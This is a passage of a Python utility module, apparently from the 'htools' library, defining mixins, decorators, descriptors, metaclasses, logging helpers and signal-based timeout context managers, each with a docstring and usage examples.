import signal
import ssl
import sys
from threading import Thread
import time
from tqdm.auto import tqdm
import types
import urllib
import warnings
from weakref import WeakSet
from htools.core import hdir, load, save, identity, hasstatic, tolist,\
select, func_name
from htools.config import STD_LIB_GIST
class AutoInit:
"""Mixin class where child class has a long list of init arguments where
the parameter name and the class attribute will be the same. Note that
*args are not supported in the init method because each attribute that is
defined in the resulting object must have a name. A variable length list
of args can still be passed in as a single argument, of course, without the
use of star unpacking.
This updated version of AutoInit is slightly more user friendly than in V1
(no more passing locals() to super()) but also slower and probably requires
more testing (all because of the frame hack in the init method). Note that
usage differs from the AutoInit present in htools<=2.0.0, so this is a
breaking change.
Examples
--------
Without AutoInit:
class Child:
def __init__(self, name, age, sex, hair, height, weight, grade, eyes):
self.name = name
self.age = age
self.sex = sex
self.hair = hair
self.height = height
self.weight = weight
self.grade = grade
self.eyes = eyes
def __repr__(self):
return f'Child(name={self.name}, age={self.age}, sex={self.sex}, '\
f'hair={self.hair}, weight={self.weight}, '\
f'grade={self.grade}, eyes={self.eyes})'
With AutoInit:
class Child(AutoInit):
def __init__(self, name, age, sex, hair, height, weight, grade, eyes):
super().__init__()
Note that we could also use the following method, though this is less
informative when constructing instances of the child class and does not
have the built in __repr__ that comes with AutoInit:
class Child:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
"""
def __init__(self):
# Calculate how many frames to go back to get child class.
frame_idx = type(self).__mro__.index(AutoInit)
attrs = {k: v for k, v in sys._getframe(frame_idx).f_locals.items()
if not k.startswith('__')}
attrs.pop('self')
bound = signature(self.__class__.__init__).bind_partial(**attrs)
# Flatten dict so kwargs are not listed as their own argument.
bound.arguments.update(
bound.arguments.pop('kwargs', {}).get('kwargs', {})
)
self._init_keys = set(bound.arguments.keys())
for k, v in bound.arguments.items():
try:
setattr(self, k, v)
except Exception as e:
warnings.warn(f'Failed to set attribute {k}. {str(v)}')
def __repr__(self):
"""Returns string representation of child class including variables
used in init method. For the example in the class docstring, this would
return:
child = Child('Henry', 8, 'm', 'brown', 52, 70, 3, 'green')
Child(name='Henry', age=8, sex='m', hair='brown', height=52,
weight=70, grade=3, eyes='green')
Returns
-------
str
"""
fstrs = (f'{k}={repr(getattr(self, k))}' for k in self._init_keys)
return f'{self.__class__.__name__}({", ".join(fstrs)})'
def auto_repr(cls):
"""Class decorator that provides __repr__ method automatically
based on __init__ parameters. This aims to provide a simpler alternative
to AutoInit that does not require access to the arguments passed to
__init__. Attributes will only be included in the repr if they are in
the class dict and appear in __init__ as a named parameter (with the
same name).
Examples
--------
@auto_repr
class Foo:
def __init__(self, a, b=6, c=None, p=0.5, **kwargs):
self.a = a
self.b = b
# Different name to demonstrate that cat is not included in repr.
self.cat = c
# Property is not stored in class dict, not included in repr.
self.p = p
@property
def p(self):
return self._p
@p.setter
def p(self, val):
if val > 0:
self._p = val
else:
raise ValueError('p must be non-negative')
>>> f = Foo(3, b='b', c='c')
>>> f
Foo(a=3, b='b')
"""
def _repr(instance):
args = dict(signature(instance.__init__).parameters)
arg_strs = (f'{k}={repr(v)}' for k, v in instance.__dict__.items()
if k in args.keys())
return f'{type(instance).__name__}({", ".join(arg_strs)})'
cls.__repr__ = _repr
return cls
def delegate(attr, iter_magics=False, skip=(), getattr_=True):
"""Decorator that automatically delegates attribute calls to an attribute
of the class. This is a nice convenience to have when using composition.
User can also choose to delegate magic methods related to iterables.
Note: I suspect this could lead to some unexpected behavior so be careful
using this in production.
KNOWN ISSUES:
-Max recursion error when a class inherits from nn.Module and
delegates to the actual model.
-Causes pickling issues at times. Haven't figured out cause yet.
Parameters
----------
attr: str
Name of variable to delegate to.
iter_magics: bool
If True, delegate the standard magic methods related to iterables:
'__getitem__', '__setitem__', '__delitem__', and '__len__'.
# TODO: maybe consider adding __contains__? It most cases it should be
fine - I believe python falls back to rely on __getitem__ - but if the
object being delegated to defines some special __contains__ logic that
is different than iterating using __getitem__, we might run into
problems.
skip: Iterable[str]
Can optionally provide a list of iter_magics to skip. This only has
an effect when `iter_magics` is True. For example, you may want to be
able to iterate over the class but no allow item deletion. In this case
you should pass skip=('__delitem__').
getattr_: bool
If True, delegate non-magic methods. This means that if you try to
access an attribute or method that the object produced by the decorated
class does not have, it will look for it in the delegated object.
Examples
--------
Example 1: We can use BeautifulSoup methods like `find_all` directly on
the Page object. Most IDEs should let us view quick documentation as well.
@delegate('soup')
class Page:
def __init__(self, url, logfile, timeout):
self.soup = self.fetch(url, timeout=timeout)
...
page = Page('http://www.coursera.org')
page.find_all('div')
Example 2: Magic methods except for __delitem__ are delegated.
@delegate('data', True, skip=('__delitem__'))
class Foo:
def __init__(self, data, city):
self.data = data
self.city = city
>>> f = Foo(['a', 'b', 'c'], 'San Francisco')
>>> len(f)
3
>>> for char in f:
>>> print(char)
a
b
c
>>> f.append(3); f.data
['a', 'b', 'c', 3]
>>> del f[0]
TypeError: 'Foo' object doesn't support item deletion
>>> f.clear(); f.data
[]
"""
def wrapper(cls):
def _delegate(self, attr):
"""Helper that retrieves object that an instance delegates to.
Just makes things a little easier to read here so we're not
layering getattr calls too deeply.
"""
return getattr(self, attr)
# Any missing attribute will be delegated.
if getattr_:
def _getattr(self, new_attr):
return getattr(_delegate(self, attr), new_attr)
cls.__getattr__ = _getattr
# If specified, delegate magic methods to make cls iterable.
if iter_magics:
if '__getitem__' not in skip:
def _getitem(self, i):
return _delegate(self, attr)[i]
setattr(cls, '__getitem__', _getitem)
if '__contains__' not in skip:
def _contains(self, i):
return i in _delegate(self, attr)
setattr(cls, '__contains__', _contains)
if '__setitem__' not in skip:
def _setitem(self, i, val):
_delegate(self, attr)[i] = val
setattr(cls, '__setitem__', _setitem)
if '__delitem__' not in skip:
def _delitem(self, i):
del _delegate(self, attr)[i]
setattr(cls, '__delitem__', _delitem)
if '__len__' not in skip:
def _len(self):
return len(_delegate(self, attr))
setattr(cls, '__len__', _len)
return cls
return wrapper
class LoggerMixin:
"""Mixin class that configures and returns a logger.
Examples
--------
class Foo(LoggerMixin):
def __init__(self, a, log_file):
self.a = a
self.log_file = log_file
self.logger = self.get_logger(log_file)
def walk(self, location):
self.logger.info(f'walk received argument {location}')
return f'walking to {location}'
"""
def get_logger(self, path=None, fmode='a', level='info',
fmt='%(asctime)s [%(levelname)s]: %(message)s'):
"""
Parameters
----------
path: str or None
If provided, this will be the path the logger writes to.
If left as None, logging will only be to stdout.
fmode: str
Logging mode when using a log file. Default 'a' for
'append'. 'w' will overwrite the previously logged messages. Note:
this only affects what happens when we create a new logger ('w'
will remove any existing text in the log file if it exists, while
'a' won't. But calling `logger.info(my_msg)` twice in a row with
the same logger will always result in two new lines, regardless of
mode.
level: str
Minimum level necessary to log messages.
One of ('debug', 'info', 'warning', 'error')
fmt: str
Format that will be used for logging messages. This uses the
logging module's formatting language, not standard Python string
formatting.
Returns
-------
logging.logger
"""
# When working in Jupyter, need to reset handlers.
# Otherwise every time we run a cell creating an
# instance of the logged class, the list of handlers will grow.
logger = logging.getLogger(type(self).__name__)
logger.handlers.clear()
logger.setLevel(getattr(logging, level.upper()))
# handler.basicConfig() doesn't work in Jupyter.
formatter = logging.Formatter(fmt)
handlers = [logging.StreamHandler(sys.stdout)]
if path:
# TODO: realized this breaks if we just pass in a file name,
# e.g. tmp.log rather than logs/tmp.log.
os.makedirs(os.path.dirname(path), exist_ok=True)
handlers.append(logging.FileHandler(path, fmode))
for handler in handlers:
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def remove_stdout_handler(self):
"""Stop logger from logging to stdout. Do not change this to mutate
self.handlers - that doesn't work. Probably means I need to
debug `delegate` a bit.
"""
self.logger.handlers = [handler for handler in self.logger.handlers
if 'stdout' not in str(handler)]
@delegate('logger')
class MultiLogger(LoggerMixin):
"""Easy way to get a pre-configured logger. This can also be used to
record stdout, either through the context manager provided by contextlib
or the function decorator defined in this module.
It delegates to its logger and should be used as follows when explicitly
called by the user:
logger = MultiLogger('train.log')
logger.info('Starting model training.'numeric)
Notice we call the `info` method rather than `write`.
"""
def __init__(self, path, fmode='w', fmt='%(message)s'):
"""
Parameters
----------
path: str or Path
The log file to save to. If None is provided, will only log to
stdout.
fmode: str
One of ('a', 'w'). See `LoggerMixin` docstring: this only affects
behavior on the first write.
fmt: str
Message format. See `LoggerMixin` docstring for details.
"""
self.logger = self.get_logger(path, fmode, 'info', fmt)
def write(self, buf):
"""Provided for compatibility with `redirect_stdout` to allow logging
of stdout while still printing it to the screen. The user should never
call this directly.
"""
if buf != '\n':
self.logger.info(buf)
def verbose_log(path, fmode='w', fmt='%(message)s'):
"""Decorator to log stdout to a file while also printing it to the screen.
Commonly used for model training.
Parameters
----------
path: str or Path
Log file.
fmode: str
One of ('a', 'w') for 'append' mode or 'write' mode. Note that 'w' only
overwrites the existing file once when the decorated function is
defined: subsequent calls to the function will not overwrite previously
logged content.
fmt: str
String format for logging messages. Uses formatting specific to
`logging` module, not standard Python string formatting.
"""
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
fn_locals = bound_args(func, args, kwargs, True)
logger = MultiLogger(path.format(**fn_locals), fmode, fmt)
with redirect_stdout(logger):
return func(*args, **kwargs)
return wrapper
return decorator
def monkeypatch(obj, attr):
"""Decorator to monkeypatch an existing object with a user-defined
function. Monkeypatching occurs at the time the function is defined.
Parameters
----------
obj: any
The object to monkeypatch.
attr: str
The attribute to override on obj. Presumably this will be a function.
Examples
--------
@monkeypatch(sys, 'excepthook')
def excepthook(type_, val, tb):
traceback.print_exception(type_, val, tb)
pdb.post_mortem(tb)
sys.excepthook will now equal our `excepthook` function, which causes us
to enter a debugging session whenever an error is thrown. Note that this
minimal example doesn't seem to work in ipython.
"""
def decorator(func):
warnings.warn(f'Registering function {func} as attribute "{attr}" on '
f'object {obj}.')
setattr(obj, attr, func)
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
return decorator
class SaveableMixin:
"""Provide object saving and loading methods. If you want to be able to
pass a file name rather than a full path to `save`, the object can define
a `self.dir` attribute.
"""
def save(self, path=None, fname=None):
"""Pickle object with optional compression.
Parameters
----------
path: str or Path
Path to save object to.
fname: str or Path
If passed in, method will use this as a filename within the
object's `dir` attribute.
"""
assert not fname or not path, 'Can\'t pass in both fname and path.'
path = path or Path(self.dir) / fname
save(self, path)
@classmethod
def load(cls, path):
"""Load object from pickle file.
Parameters
----------
path: str or Path
Name of file where object is stored.
"""
return load(path)
def chainmethod(func):
"""Decorator for methods in classes that want to implement
eager chaining. Chainable methods should be instance methods
that change 1 or more instance attributes and return None. All this
decorator does is ensure these methods are called on a deep copy of the
instance instead of on the instance itself so that operations don't affect
the original object. The new object is returned.
Examples
--------
@auto_repr
class EagerChainable:
def __init__(self, arr, b=3):
self.arr = arr
self.b = b
@chainmethod
def double(self):
self.b *= 2
@chainmethod
def add(self, n):
self.arr = [x+n for x in self.arr]
@chainmethod
def append(self, n):
self.arr.append(n)
>>> ec = EagerChainable([1, 3, 5, -22], b=17)
>>> ec
EagerChainable(arr=[1, 3, 5, -22], b=17)
>>> ec2 = ec.append(99).double().add(400)
>>> ec2
EagerChainable(arr=[401, 403, 405, 378, 499], b=34)
>>> ec # Remains unchanged.
EagerChainable(arr=[1, 3, 5, -22], b=17)
"""
@wraps(func)
def wrapper(instance, *args, **kwargs):
new_inst = deepcopy(instance)
func(new_inst, *args, **kwargs)
return new_inst
return wrapper
def lazychain(func):
"""Decorator to register a method as chainable within a
LazyChainable class.
"""
func._is_chainable = True
@wraps(func)
def wrapped(*args, **kwargs):
return func(*args, **kwargs)
return wrapped
class LazyChainMeta(type):
"""Metaclass to create LazyChainable objects."""
def __new__(cls, name, bases, methods):
new_methods = {}
# Find chainable staticmethods and create public versions.
for k, v in methods.items():
try:
func = v.__get__(1)
assert func._is_chainable
except:
continue
public_name = k.lstrip('_')
# Get args and kwargs passed to staticmethod (except for instance).
sig = signature(func)
sig = sig.replace(parameters=list(sig.parameters.values())[1:])
# Must use default args so they are evaluated within loop.
def make_public_method(func=func, private_name=k,
public_name=public_name, sig=sig):
def public(inst, *args, **kwargs):
bound = sig.bind(*args, **kwargs).arguments
new_method = partial(getattr(inst, private_name), **bound)
inst.ops.append(new_method)
return inst
public.__name__ = public_name
return public
new_methods[public_name] = make_public_method()
return type.__new__(cls, name, bases, {**methods, **new_methods})
class LazyChainable(metaclass=LazyChainMeta):
"""Base class that allows children to lazily chain methods,
similar to a Spark RDD.
Chainable methods must be decorated with @staticmethod
and @chainmethod and be named with a leading underscore. A public
method without the leading underscore will be created, so don't
overwrite this with another method. Chainable methods
accept an instance of the same class as the first argument,
process the instance in some way, then return it. A chain of
commands will be stored until the exec() method is called.
It can operate either in place or not.
Examples
--------
class Sequence(LazyChainable):
def __init__(self, numbers, counter, new=True):
super().__init__()
self.numbers = numbers
self.counter = counter
self.new = new
@staticmethod
@lazychain
def _sub(instance, n):
instance.counter -= n
return instance
@staticmethod
@lazychain
def _gt(instance, n=0):
instance.numbers = list(filter(lambda x: x > n, instance.numbers))
return instance
@staticmethod
@lazychain
def _call(instance):
instance.new = False
return instance
def __repr__(self):
pre, suf = super().__repr__().split('(')
argstrs = (f'{k}={repr(v)}' for k, v in vars(self).items())
return f'{pre}({", ".join(argstrs)}, {suf}'
>>> seq = Sequence([3, -1, 5], 0)
>>> output = seq.sub(n=3).gt(0).call().exec()
>>> output
Sequence(ops=[], numbers=[3, 5], counter=-3, new=False)
>>> seq # Unchanged because exec was not in place.
Sequence(ops=[], numbers=[3, -1, 5], counter=0, new=True)
>>> output = seq.sub(n=3).gt(-1).call().exec(inplace=True)
>>> output # None because exec was in place.
>>> seq # Changed
Sequence(ops=[], numbers=[3, -1, 5], counter=-3, new=False)
"""
def __init__(self):
self.ops = []
def exec(self, inplace=False):
new = deepcopy(self)
for func in self.ops:
new = func(copy(new))
# Clear ops list now that chain is complete.
new.ops.clear()
if inplace:
self.__dict__ = new.__dict__
else:
self.ops.clear()
return new
def __repr__(self):
argstrs = (f'{k}={repr(v)}' for k, v in vars(self).items())
return f'{type(self).__name__}({", ".join(argstrs)})'
class ContextDecorator(ABC):
"""Abstract class that makes it easier to define classes that can serve
either as decorators or context managers. This is a viable option if the
function decorator case effectively wants to execute the function inside a
context manager. If you want to do something more complex, this may not be
appropriate since it's not clear what would happen in the context manager
use case. Parentheses must be used in both cases (see examples).
Examples
--------
import time
class Timer(ContextDecorator):
def __init__(self):
# More complex decorators might need to store variables here.
def __enter__(self):
self.start = time.perf_counter()
def __exit__(self, exc_type, exc_value, traceback):
print('TIME:', time.perf_counter() - self.start)
@Timer()
def foo(a, *args):
# do something
with Timer():
# do something
# Both of these usage methods work!
"""
def __call__(self, *args, **kwargs):
"""This method is NOT called when using child class as a context
manager.
"""
# Handle case where the decorated function is implicitly passed to the
# decorator. Return the uncalled method just like how we often
# `return wrapper` when writing a decorator as a function.
if not hasattr(self, 'func'):
self._wrap_func(args[0])
return self.__call__
self.__enter__()
res = self.func(*args, **kwargs)
self.__exit__(None, None, None)
return res
def _wrap_func(self, func):
self.func = func
update_wrapper(self, func)
@abstractmethod
def __enter__(self):
"""Do whatever you want to happen before executing the function (or
the block of code inside the context manager).
"""
@abstractmethod
def __exit__(self, exc_type, exc_value, traceback):
"""Do anything that happens after the function finishes executing.
The three arguments will all be None unless an error occurs.
To suppress an error, this method must return True.
"""
class Stopwatch(ContextDecorator):
"""Print elapsed time in seconds during a function call or within a context
manager. Because this is a ContextDecorator, you must explicitly
instantiate this in both cases.
@Stopwatch()
def foo():
# Do something.
with Stopwatch():
# Do something.
"""
def __init__(self):
self.thread = None
self.running = False
# Printing is not thread-safe so use logger instead. This format allows
# us to update a single line rather than creating endless rows of
# messages.
self.logger = MultiLogger(None, fmt='\x1b[80D\x1b[1A\x1b[K%(message)s')
def _start(self):
"""Update elapsed time every tenth of a second."""
i = 1
while self.running:
time.sleep(.1)
self.logger.info(f'Elapsed: {round(i * .1, 1)} sec')
i += 1
def start(self):
"""Start stopwatch in a new thread."""
self.thread = Thread(target=self._start)
self.thread.start()
def stop(self):
self.thread.join()
def __enter__(self):
self.running = True
self.start()
def __exit__(self, exc_type, exc_val, traceback):
"""Can't easily kill thread manually so we must tell it that we're no
longer running.
"""
self.running = False
self.stop()
class class_or_instancemethod(classmethod):
"""Decorate a method so it can be called as both an instancemethod and a
classmethod. The first argument to the method will be either the instance
OR the class, depending on how it's called.
Examples
--------
class Foo:
@class_or_instancemethod
def bar(self, x):
if isinstance(self, type):
# Classmethod functionality.
else:
# Instancemethod functionality.
"""
def __get__(self, instance, cls):
get = super().__get__ if instance is None else self.__func__.__get__
return get(instance, cls)
class AbstractAttrs(type):
"""Basically the attribute equivalent of abc.abstractmethod: this allows
us to define an abstract parent class that requires its children to
possess certain class and/or instance attributes. This differs from
abc.abstractproperty in a few ways:
1. abstractproperty ignores instance attributes. AbstractAttrs lets us
specify required instance attributes and/or class attributes and
distinguish between the two.
2. abstractproperty considers the requirement fulfilled by methods,
properties, and class attributes. AbstractAttrs does not allow methods
(including classmethods and staticmethods) to fulfill either requirement,
though properties can fulfill either.
Examples
--------
This class defines required instance attributes and class attributes,
but you can also specify one or the other. If you don't care whether an
attribute is at the class or instance level, you can simply use
@abc.abstractproperty.
class Parent(metaclass=AbstractAttrs,
inst_attrs=['name', 'metric', 'strategy'],
class_attrs=['order', 'is_val', 'strategy']):
pass
Below, we define a child class that fulfills some but not all requirements.
class Child(Parent):
order = 1
metric = 'mse'
def __init__(self, x):
self.x = x
@staticmethod
def is_val(x):
...
@property
def strategy():
...
def name(self):
...
More specifically:
Pass
-possesses class attr 'order'
-possess attribute 'strategy' (property counts as an instance attribute but
not a class attribute. This is consistent with how it can be called:
inst.my_property returns a value, cls.my_property returns a property
object.)
Fail
-'metric' is a class attribute while our interface requires it to be a
class attribute
-'name' is a method but it must be an instance attribute
-'is_val' is a staticmethod but it must be a class attribute
"""
def __new__(cls, name, bases, methods, **meta_kwargs):
"""This provides user-defined parent classes with an
`__init_subclass__` method that checks for class attributes. Errors
will occur when the parent class is defined, not when instances of it
are constructed.
"""
class_ = type.__new__(cls, name, bases, methods)
class_attrs = meta_kwargs.get('class_attrs', [])
inst_attrs = meta_kwargs.get('inst_attrs', [])
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
for attr in class_attrs:
# TypeError maintains consistency with abstractmethod.
# Remaining checks occur at instantiation.
if not hasattr(cls, attr):
raise TypeError(f'{cls} must have class attribute '
f'`{attr}`.')
# Make sure we distinguish between the abstract parent class that
# defines an interface and the child classes that implement it. The
# abstract parent should not define the required attributes: it merely
# enforces the requirement that its children do. We want the children
# to inherit class_attrs and inst_attrs without overwriting them when
# use them for validation. Only change this if you're very confident
# you understand the repercussions.
if class_attrs or inst_attrs:
class_.__init_subclass__ = classmethod(__init_subclass__)
class_._is_parent = True
class_.class_attrs = class_attrs
class_.inst_attrs = inst_attrs
else:
class_._is_parent = False
return class_
def __call__(cls, *args, **kwargs):
"""This is called when we create instances of our classes. Parents are
initialized normally, while children undergo a series of checks for
each of our required attributes.
"""
inst = cls.__new__(cls, *args, **kwargs)
if not isinstance(inst, cls): return inst
inst.__init__(*args, **kwargs)
if cls._is_parent: return inst
# Validate children.
for attr in inst.inst_attrs:
# TypeError maintains consistency with abstractmethod.
if not hasattr(inst, attr):
raise TypeError(f'Instances of {type(inst)} must '
f'have instance attribute `{attr}`.')
elif ismethod(getattr(inst, attr)):
raise TypeError(f'`{attr}` must be an instance attribute, '
'not a method.')
# In AbstractAttrs.__new__, methods are still unbound so we couldn't
# easily check this until now.
for attr in inst.class_attrs:
# `ismethod` must check inst, not cls (cls.method is a function
# while inst.method is a method). staticmethod can be retrieved
# from either.
if inspect.ismethod(getattr(inst, attr)) or hasstatic(inst, attr):
raise TypeError(f'`{attr}` must be a class attribute, not a '
'method.')
# property must be retrieved from cls, not inst.
elif isinstance(getattr(cls, attr), property):
raise TypeError(
f'`{attr}` must be a class attribute, not a property. '
'Properties fulfill instance attribute requirements but '
'not class attribute requirements.'
)
return inst
class Counted:
"""Add zero-index instance attribute "instance_num" tracking order in
which instances were created. Class attribute "_instance_count" tracks the
total number of instances of the class.
class Bar(Counted):
def __init__(self):
super().__init__()
self.x = x
>>> b = Bar(3)
>>> b2 = Bar(3)
>>> b.instance_num, b2.instance_num
0, 1
>>> Bar._instance_count
2
"""
def __init_subclass__(cls, **kwargs):
cls._instance_count = 0
def __init__(self):
self.instance_num = self._instance_count
type(self)._instance_count += 1
def __del__(self):
self._instance_count -= 1
def counted(func):
"""Decorator to count the number of times a function has been called. The
count updates AFTER the call completes.
"""
@wraps(func)
def wrapper(*args, **kwargs):
res = func(*args, **kwargs)
wrapper.call_count += 1
return res
wrapper.call_count = 0
return wrapper
def params(func):
"""Get parameters in a functions signature.
Parameters
----------
func: function
Returns
-------
dict: Maps name (str) to Parameter.
"""
return dict(signature(func).parameters)
def hasarg(func, arg):
"""Check if a function has a parameter with a given name. (Technically,
hasparam might be a more appropriate name but hasarg lets us match the
no-space convention of hasattr and getattr while maintaining readability.)
Parameters
----------
func: function
arg: str
The name of the parameter that you want to check for in func's
signature.
Returns
-------
bool: True if `func` has a parameter named `arg`.
"""
return arg in params(func)
def bound_args(func, args, kwargs, collapse_kwargs=True):
"""Get the bound arguments for a function (with defaults applied). This is
very commonly used when building decorators that log, check, or alter how
a function was called.
Parameters
----------
func: function
args: tuple
Notice this is not *args. Just pass in the tuple.
kwargs: dict
Notice this is not **kwargs. just pass in the dict.
collapse_kwargs: bool
If True, collapse kwargs into the regular parameter dict. E.g.
{'a': 1, 'b': True, 'kwargs': {'c': 'c_val', 'd': 0}} ->
{'a': 1, 'b': True, 'c': 'c_val', 'd': 0}
Returns
-------
OrderedDict[str, any]: Maps parameter name to passed value.
"""
bound = signature(func).bind_partial(*args, **kwargs)
bound.apply_defaults()
args = bound.arguments
if not collapse_kwargs: return args
args.update(args.pop('kwargs', {}))
return args
def handle_interrupt(func=None, cbs=(), verbose=True):
"""Decorator that allows us to interrupt a function with ctrl-c. We can
pass in callbacks that execute on function end. Keep in mind that local
variables will be lost as soon as `func` stops running. If `func` is a
method, it may be appropriate to update instance variables while running,
which we can access because the instance will be the first element of
`args` (passed in as `self`).
Notes:
-Kwargs are passed to callbacks as a single dict, not as **kwargs.
-A 'status_code' parameter tracks whether the last call was successful.
The decorated function obviously can't reference the status of the current
call since it's unknown until the function call completes, but the
status is updated before executing any callbacks.
Parameters
----------
func: function
cbs: Iterable[Callback]
List of callbacks to execute when `func` completes. These will execute
whether we interrupt or not.
verbose: bool
If True, print a message to stdout when an interrupt occurs.
"""
if not func:
return partial(handle_interrupt, cbs=tolist(cbs), verbose=verbose)
func.status_code = 0
for cb in cbs:
cb.setup(func)
@wraps(func)
def wrapper(*args, **kwargs):
func_inputs = bound_args(func, args, kwargs, collapse_kwargs=False)
for cb in cbs:
cb.on_begin(func, func_inputs)
try:
res = func(*args, **kwargs)
wrapper.status_code = 0
except KeyboardInterrupt:
if verbose: print('KeyboardInterrupt. Aborting...')
res = None
wrapper.status_code = 1
finally:
for cb in cbs:
cb.on_end(func, func_inputs, res)
return res
return wrapper
@contextmanager
def assert_raises(error):
"""Context manager to assert that an error is raised. This can be nice
if we don't want to clutter up a notebook with error messages.
Parameters
----------
error: class inheriting from Exception or BaseException
The type of error to catch, e.g. ValueError.
Examples
--------
# First example does not throw an error.
>>> with assert_raises(TypeError) as ar:
>>> a = 'b' + 6
# Second example throws an error.
>>> with assert_raises(ValueError) as ar:
>>> a = 'b' + 6
AssertionError: Wrong error raised. Expected PermissionError, got
TypeError(can only concatenate str (not "int") to str)
# Third example throws an error because the code inside the context manager
# completed successfully.
>>> with assert_raises(ValueError) as ar:
>>> a = 'b' + '6'
AssertionError: No error raised, expected PermissionError.
"""
try:
yield
except error as e:
print(f'As expected, got {error.__name__}({e}).')
except Exception as e:
raise AssertionError(f'Wrong error raised. Expected {error.__name__},'
f' got {type(e).__name__}({e}).') from None
else:
raise AssertionError(f'No error raised, expected {error.__name__}.')
class TimeExceededError(Exception):
pass
def timebox_handler(time, frame):
raise TimeExceededError('Time limit exceeded.')
@contextmanager
def timebox(seconds, strict=True, freq=.1, cleanup=True):
"""Try to execute code for specified amount of time before throwing error.
If you don't want to throw an error, use with a try/except block.
Parameters
----------
seconds: float
Max number of seconds before throwing error. This will be enforced with
a relatively low level of precision.
strict: bool
If True, timeout will cause an error to be raised, halting execution of
the entire program. If False, a warning message will be printed and
the timeboxed operation will end, letting the program proceed to the
next step.
freq: float
How often to update progress bar (measured in seconds).
cleanup: bool
If True, progress bar will disappear on function end. This is nice if
we're calling the decorated function inside a loop and don't want
hundreds of progress bars littering the notebook/terminal.
Examples
--------
with time_box(5) as tb:
x = computationally_expensive_code()
More permissive version:
x = step_1()
with timebox(5) as tb:
try:
x = slow_step_2()
except TimeExceededError:
pass
"""
def update_custom_pbar(signum, frame):
"""Handler that is called every `freq` seconds. User never calls this
directly.
"""
pbar.update(n=freq)
if time.time() - pbar.start_t >= seconds:
raise TimeExceededError('Time limit exceeded.')
pbar = tqdm(total=seconds, bar_format='{l_bar}{bar}|{n:.2f}/{total:.1f}s',
leave=not cleanup)
try:
signal.signal(signal.SIGALRM, update_custom_pbar)
signal.setitimer(signal.ITIMER_REAL, freq, freq)
yield
except TimeExceededError as e:
if strict: raise
warnings.warn(e.args[0])
finally:
pbar.close()
signal.alarm(0)
def timeboxed(time, strict=True, freq=.1):
"""Decorator version of timebox. Try to execute decorated function for
`time` seconds before throwing exception.
Parameters
----------
time: float
Max number of seconds before throwing error. This will be enforced with
a relatively low level of precision.
strict: bool
If True, timeout will cause an error to be raised, halting execution of
the entire program. If False, a warning message will be printed and
the timeboxed operation will end, letting the program proceed to the
next step.
freq: float
How often to update the progress bar (measured in seconds).
Examples
--------
@timeboxed(5)
def func(x, y):
# If function does not complete within 5 seconds, will throw error.
"""
def intermediate_wrapper(func):
@wraps(func)
def wrapper(*args, **kwargs):
with timebox(time, strict, freq) as tb:
return func(*args, **kwargs)
return wrapper
return intermediate_wrapper
class cached_property:
"""Decorator for computationally expensive methods that should only be
computed once (i.e. they take zero arguments aside from self and are slow
to execute). Lowercase name is used for consistency with more decorators.
Heavily influenced by example in `Python Cookbook` by David Beazley and
Brian K. Jones. Note that, as with the @property decorator, no parentheses
are used when calling the decorated method.
Examples
--------
class Vocab:
def __init__(self, tokens):
self.tokens = tokens
@cached_property
def embedding_matrix(self):
print('Building matrix...')
# Slow computation to build and return a matrix of word embeddings.
return matrix
# First call is slow.
>>> v = Vocab(tokens)
>>> v.embedding_matrix
Building matrix...
[[.03, .5, .22, .01],
[.4, .13, .06, .55]
[.77, .14, .05, .9]]
# Second call accesses attribute without re-computing
# (notice no "Building matrix" message).
>>> v.embedding_matrix
[[.03, .5, .22, .01],
[.4, .13, .06, .55]
[.77, .14, .05, .9]]
"""
def __init__(self, func):
self.func = func
def __get__(self, instance, cls):
"""This method is called when the variable being accessed is not in the
instance's state dict. The next time the attribute is accessed, the
computed value will be in the state dict so this method (and the method
in the instance itself) is not called again unless the attribute is
deleted.
"""
# When attribute accessed as class method, instance is None.
if instance is None:
return self
# When accessed as instance method, call method on instance as usual.
# Then set instance attribute and return value.
val = self.func(instance)
setattr(instance, self.func.__name__, val)
return val
class ReadOnly:
"""Descriptor to make an attribute read-only. This means that once a value
has been set, the user cannot change or delete it. Note that read-only
attributes must first be created as class variables (see example below).
To allow more flexibility, we do allow the user to manually manipulate the
instance dictionary.
Examples
--------
class Dog:
breed = ReadOnly()
def __init__(self, breed, age):
# Once breed is set in the line below, it cannot be changed.
self.breed = breed
self.age = age
>>> d = Dog('dalmatian', 'Arnold')
>>> d.breed
'dalmatian'
>>> d.breed = 'labrador'
PermissionError: Attribute is read-only.
>>> del d.breed
PermissionError: Attribute is read-only.
"""
def __init__(self):
self.initialized = WeakSet()
def __set_name__(self, owner, name):
self.name = name
def __get__(self, instance, cls):
if instance is None:
return self
elif instance not in self.initialized:
warnings.warn(
f'Read-only attribute {self.name} has not been initialized.'
)
else:
return instance.__dict__[self.name]
def __set__(self, instance, value):
if instance not in self.initialized:
instance.__dict__[self.name] = value
self.initialized.add(instance)
else:
raise PermissionError('Attribute is read-only.')
def __delete__(self, instance):
raise PermissionError('Attribute is read-only.')
def validating_property(func, allow_del=False):
"""Factory that makes properties that perform some user-specified
validation when setting values. The returned function must be used as a
descriptor to create a class variable before setting the instance
attribute.
Parameters
----------
func: function
Function or lambda that accepts a single parameter. This will be used
when attempting to set a value for the managed attribute. It should
return True if the value is acceptable, False otherwise.
allow_del: bool
If True, allow the attribute to be deleted.
Returns
-------
function: A property with validation when setting values. Note that this
will be used as a descriptor, so it must create a class variable as
shown below. In the example, also notice that the name passed to
LengthyInt mustt match the name of the variable it is assigned to.
Examples
--------
LengthyInt = validating_property(
lambda x: isinstance(x, int) and len(str(int)) > 4
)
class Foo:
long = LengthyInt('long')
def __init__(self, a, long):
self.a = a
self.long = long
>>> foo = Foo(3, 4)
ValueError: Invalid value 4 for argument long.
# No error on instantiation because the argument is a valid LengthyInt.
>>> foo = Foo(3, 543210)
>>> foo.long
543210
>>> foo = Foo(3, 'abc')
ValueError: Invalid value 'abc' for argument long.
"""
def prop(name):
@property
def method(instance):
return instance.__dict__[name]
@method.setter
def method(instance, val):
if func(val):
instance.__dict__[name] = val
else:
raise ValueError(f'Invalid value {val} for argument {name}.')
if allow_del:
@method.deleter
def method(instance):
del instance.__dict__[name]
return method
return prop
class Callback(ABC):
"""Abstract base class for callback objects to be passed to @callbacks
decorator. Children must implement on_begin and on_end methods. Both should
accept the decorated function's inputs and output as arguments
Often, we may want to use the @debug decorator on one or both of these
